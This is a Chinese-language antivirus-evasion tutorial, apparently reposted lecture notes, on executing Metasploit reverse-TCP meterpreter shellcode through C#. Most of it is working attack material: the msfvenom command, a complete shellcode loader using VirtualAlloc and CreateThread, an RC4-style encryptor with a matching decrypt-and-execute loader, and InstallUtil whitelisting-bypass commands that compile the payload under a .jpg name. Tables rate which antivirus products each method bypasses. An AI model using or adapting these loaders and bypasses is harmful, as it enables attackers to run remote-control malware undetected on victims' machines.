来源于101次直播
预告:下一节文章
签名&特征码定位&资源修改
#知识点:1、C#-Shellcode编译2、C#-Shellcode编译加密3、C#-Shellcode白名单执行4、全局免杀技术-白名单执行#以下环境采用MSF生成的C-Shellcode测试
1、C#-Shellcode-单纯编译
| 安全厂商 | 语言/类别 | 结果 |
| 管家(勾引擎,默认没勾) | C#/直接编译 | GG |
| 某绒 | C#/直接编译 | GG |
| X60 | C#/直接编译 | GG |
| Defender | C#/直接编译 | GG |
利用思路:直接利用生成的Shellcode采用C#编译msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6688 -f csharp
using System;using System.Runtime.InteropServices;namespace TCPMeterpreterProcess{class Program{static void Main(string[] args){// native function’s compiled code// generated with metasploitbyte[] shellcode = new byte[] { }; //MSF shellcodeUInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);IntPtr hThread = IntPtr.Zero;UInt32 threadId = 0;// prepare dataIntPtr pinfo = IntPtr.Zero;// execute native codehThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);WaitForSingleObject(hThread, 0xFFFFFFFF);}private static UInt32 MEM_COMMIT = 0x1000;private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;[DllImport("kernel32")]private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);[DllImport("kernel32")]private static extern bool VirtualFree(IntPtr lpAddress,UInt32 dwSize, UInt32 dwFreeType);[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 lpThreadAttributes,UInt32 dwStackSize,UInt32 lpStartAddress,IntPtr param,UInt32 dwCreationFlags,ref UInt32 lpThreadId);[DllImport("kernel32")]private static extern bool CloseHandle(IntPtr handle);[DllImport("kernel32")]private static extern UInt32 WaitForSingleObject(IntPtr hHandle,UInt32 dwMilliseconds);[DllImport("kernel32")]private static extern IntPtr GetModuleHandle(string moduleName);[DllImport("kernel32")]private static extern UInt32 GetProcAddress(IntPtr hModule,string procName);[DllImport("kernel32")]private static extern UInt32 LoadLibrary(string lpFileName);[DllImport("kernel32")]private static extern UInt32 GetLastError();}}
2、C#-Shellcode-加密编译
| 安全厂商 | 语言/类别 | 结果 |
| 管家(勾引擎,默认没勾) | C#/加密混淆 | GG |
| 某绒 | C#/加密混淆 | GG |
| X60 | C#/加密混淆 | GG |
| Defender | C#/加密混淆 | GG |
利用思路:先脚本1加密Shellcode,后脚本2解密执行Shellcodemsfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6688 -f csharp
using System;using System.Collections.Generic;using System.IO;using System.Linq;using System.Security.Cryptography;using System.Text;using System.Threading.Tasks;using System.Reflection;using System.Runtime.CompilerServices;using System.Runtime.InteropServices;namespace Payload_Encrypt_Maker{class Program{// 加密密钥,可以更改,加解密源码中保持KEY一致就行static byte[] KEY = { 0x33, 0x11, 0x33, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x33, 0x01, 0x33, 0x33, 0x00, 0x00 };static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };static byte[] payload = { }; // 替换成MSF生成的shellcodeprivate static class Encryption_Class{public static string Encrypt(string key, string data){Encoding unicode = Encoding.Unicode;return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));}public static byte[] Encrypt(byte[] key, byte[] data){return EncryptOutput(key, data).ToArray();}private static byte[] EncryptInitalize(byte[] key){byte[] s = Enumerable.Range(0, 256).Select(i => (byte)i).ToArray();for (int i = 0, j = 0; i < 256; i++){j = (j + key[i % key.Length] + s[i]) & 255;Swap(s, i, j);}return s;}private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data){byte[] s = EncryptInitalize(key);int i = 0;int j = 0;return data.Select((b) =>{i = (i + 1) & 255;j = (j + s[i]) & 255;Swap(s, i, j);return (byte)(b ^ s[(s[i] + s[j]) & 255]);});}private static void Swap(byte[] s, int i, int j){byte c = s[i];s[i] = s[j];s[j] = c;}}static void Main(string[] args){byte[] result = Encryption_Class.Encrypt(KEY, payload);int b = 0;for (int i = 0; i < result.Length; i++){b++;if (i == result.Length + 1){ Console.Write(result[i].ToString()); }if (i != result.Length) { Console.Write(result[i].ToString() + ","); }}}}}
using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Runtime.InteropServices;using System.Threading;using System.Reflection;using System.Runtime.CompilerServices;namespace NativePayload_Reverse_tcp{public class Program{public static void Main(){Shellcode.Exec();}}class Shellcode{public static void Exec(){string Payload_Encrypted;Payload_Encrypted = ""; //加密的shellcodestring[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++){byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());_X_to_Bytes[i] = current;}// 解密密钥,可以更改,加解密源码中保持KEY一致就行byte[] KEY = { 0x33, 0x11, 0x33, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x33, 0x00, 0x00, 0x00, 0x00, 0x00, 0x33, 0x00, 0x33, 0x01, 0x33, 0x33, 0x00, 0x00 };byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);// 加载shellcodeIntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);Thread.Sleep(2000);}public static byte[] Decrypt(byte[] key, byte[] data){return EncryptOutput(key, data).ToArray();}private static byte[] EncryptInitalize(byte[] key){byte[] s = Enumerable.Range(0, 256).Select(i => (byte)i).ToArray();for (int i = 0, j = 0; i < 256; i++){j = (j + key[i % key.Length] + s[i]) & 255;Swap(s, i, j);}return s;}private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data){byte[] s = EncryptInitalize(key);int i = 0;int j = 0;return data.Select((b) =>{i = (i + 1) & 255;j = (j + s[i]) & 255;Swap(s, i, j);return (byte)(b ^ s[(s[i] + s[j]) & 255]);});}private static void Swap(byte[] s, int i, int j){byte c = s[i];s[i] = s[j];s[j] = c;}[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);}}
3、C#-Shellcode-白名单执行
| 安全厂商 | 语言/类别 | 结果 |
| 管家(勾引擎,默认没勾) | C#/白名单执行 | Bypass |
| 某绒 | C#/白名单执行 | Bypass |
| X60 | C#/白名单执行 | GG |
| Defender | C#/白名单执行 | GG |
白名单执行:(InstallUtil)csc 简单来讲,其实就是个c# 的命令行编译工具,专门用来编译*.cs文件用的installutil 微软官方给的解释,它允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,暂且就简单把它理解成windows内置的一种命令行安装工具就行编译执行:https://github.com/Jumbo-WJB/InstallUtil-Shellcode-cs/blob/master/InstallUtil-Shellcode-cs技术来源:https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/存储目录:C:\Windows\Microsoft.NET\Framework\v2.0.50727编译Shellcoe:csc /unsafe /platform:x86 /out:d:\xiaodi.exe InstallUtil-ShellCode.cscsc /unsafe /platform:x86 /out:d:\xiaodi.jpg InstallUtil-ShellCode.cs白名单加载执行:InstallUtil /logfile= /LogToConsole=false /U d:\xiaodi.jpg
文章转载自小迪安全,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
